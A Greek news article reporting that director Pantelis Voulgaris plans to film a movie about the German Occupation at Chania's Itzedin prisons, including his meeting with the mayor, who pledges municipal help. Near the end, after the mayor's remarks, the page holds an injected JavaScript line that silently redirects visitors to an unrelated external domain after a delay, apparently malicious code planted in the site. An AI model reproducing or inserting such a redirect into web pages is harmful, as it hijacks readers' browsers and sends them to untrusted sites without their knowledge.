Τα Χανιά της Κατοχής σκηνικό για τη νέα ταινία του Παντελή Βούλγαρη

0
7

 

Οι φυλακές του Ιτζεδίν «τραβούν» τον Παντελή Βούλγαρη πίσω στα Χανιά για τα γυρίσματα της νέας του ταινίας που τοποθετείται χρονικά στην περίοδο της Γερμανικής Κατοχής. Στόχος είναι τα γυρίσματα να ξεκινήσουν τον Μάρτιο του 2017 και να γίνουν αποκλειστικά στα Χανιά.

«Είναι μια εποχή που την μελετάω και την ψάχνω πολλά χρόνια. Το θέμα είναι ότι όλα αυτά τα χρόνια που διαβάζω σύγχρονη ιστορία είναι για να καταλάβω σε τι τόπο ζω και τι έχει συμβεί. Η Κατοχή είναι μια αδικημένη εποχή ιστοριογραφικά και η μελέτη συμπεριλαμβάνει εφημερίδες, θεατρικές παραστάσεις της εποχής και προσωπικές περιπέτειες και είναι πολύ σημαντικό να αποτυπωθεί κάποια στιγμή στο σινεμά. Γιατί υπήρχαν νέα παιδιά που στηθήκανε στον τοίχο για κάποιες ιδέες για την ελευθερία αυτού του τόπου και τώρα που μεγάλωσα -και δεν ξέρω πόσες ταινίες θα κάνω ακόμα- οφείλω μια ταινία γι’ αυτά τα παιδιά» δήλωσε ο Παντελής Βούλγαρης στο zarpanews.gr, στο περιθώριο συνάντησης στο Δημαρχείο. «Και οι φυλακές του Ιτζεδίν είναι ο ιδανικός χώρος», προσέθεσε.

Το πρωί, ο γνωστός σκηνοθέτης, συνοδευόμενος από την σύζυγό του συγγραφέα Ιωάννα Καρυστιάνη και τον παραγωγό της ταινίας Γιάννη Ιακωβίδη, συναντήθηκαν με τον Δήμαρχο Τάσο Βάμβουκα και την Αντιδήμαρχο Πολιτισμού Βαρβάρα Περάκη, από τους οποίους ζήτησαν αρωγή σε μια σειρά θεμάτων σε σχέση με την παραγωγή.

Όπως είπαν, θα χρειαστούν κάποια Γερμανικά οχήματα, μοτοσυκλέτες, καμιόνια, όπλα και άλλον εξοπλισμό, έναν μεγάλο χώρο για να χρησιμεύσει ως αποθήκη, χώρο για πρόβες όπως και πολλούς ερασιτέχνες ηθοποιούς και κομπάρσους.

Μάλιστα, οι ίδιοι εξομολογήθηκαν ότι τους έχουν γίνει προτάσεις από πολλές πόλεις της Ελλάδας για να γίνουν εκεί τα γυρίσματα, όμως είναι η μοναδικότητα του Ιτζεδίν που τους έφερε εδώ, παρά τις δυσκολίες ανεύρεσης των κατάλληλων εξωτερικών χώρων, αφού στα Χανιά δεν υπάρχουν προπολεμικές συνοικίες που να μην έχουν υποστεί μετέπειτα παρεμβάσεις.

«Οι ταινίες εποχής είναι πολύ επικίνδυνες, με την έννοια ότι η παραμικρή λεπτομέρεια ο σημερινός θεατής την αντιλαμβάνεται», τόνισε ο κ. Βούλγαρης.

Αρωγός ο Δήμος

Από τη μεριά του, ο Δήμαρχος Χανίων δεσμεύτηκε ότι θα παρέχει τις απαραίτητες διευκολύνσεις για να ολοκληρωθεί η ταινία.

«Ως Δημοτική Αρχή και ως Δήμαρχος υποστηρίζω την άποψη ότι τα Χανιά είναι ένας πολύ κατάλληλος τόπος για να γυρίζονται ταινίες. Είναι ένας τόπος που είναι ήδη συνδεδεμένος από πολύ παλιά με τον κινηματογράφο» τόνισε και προσέθεσε: «Τα Χανιά και ο νομός Χανίων ευρύτερα είναι γενικώς ένας τόπος πολύ κατάλληλος σχεδόν για κάθε είδους γυρίσματα. Αυτό έρχεται σήμερα για ακόμα φορά να μας επιβεβαιώσει ένας σπουδαίος σκηνοθέτη τον Παντελή Βούλγαρη, τον οποίο ιδιαιτέρως ευχαριστούμε διότι έχει μια αγάπη και μια προτίμηση στον τόπο μας και μαζί με τη σύζυγό του κ. Ιωάννα Καρυστιάνη, σπουδαία συγγραφέα, βρίσκονται στα Χανιά εν’ όψει της νέας ταινίας. Συζητάμε για τον τρόπο με τον οποίο θα διευκολύνουμε τα γυρίσματα αυτής της ταινίας ως Δήμος».

Επεσήμανε επίσης πως αν και οι φυλακές του Ιτζεδίν ανήκουν στο Ελληνικό Δημόσιο «ο Δήμος Χανίων έχει τεράστιο ενδιαφέρον και το επόμενο διάστημα θα ανοίξουμε μία συζήτηση για το τι θα μπορούσε να γίνει εκεί. Υπάρχουν σκέψεις, όμως σαν κοινωνία πρέπει να κάνουμε την πρότασή μας και να διεκδικήσουμε αυτό το πολύ σημαντικό μνημείο να μην αφήνεται να καταρρέει στον χρόνο αλλά να αξιοποιηθεί».

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here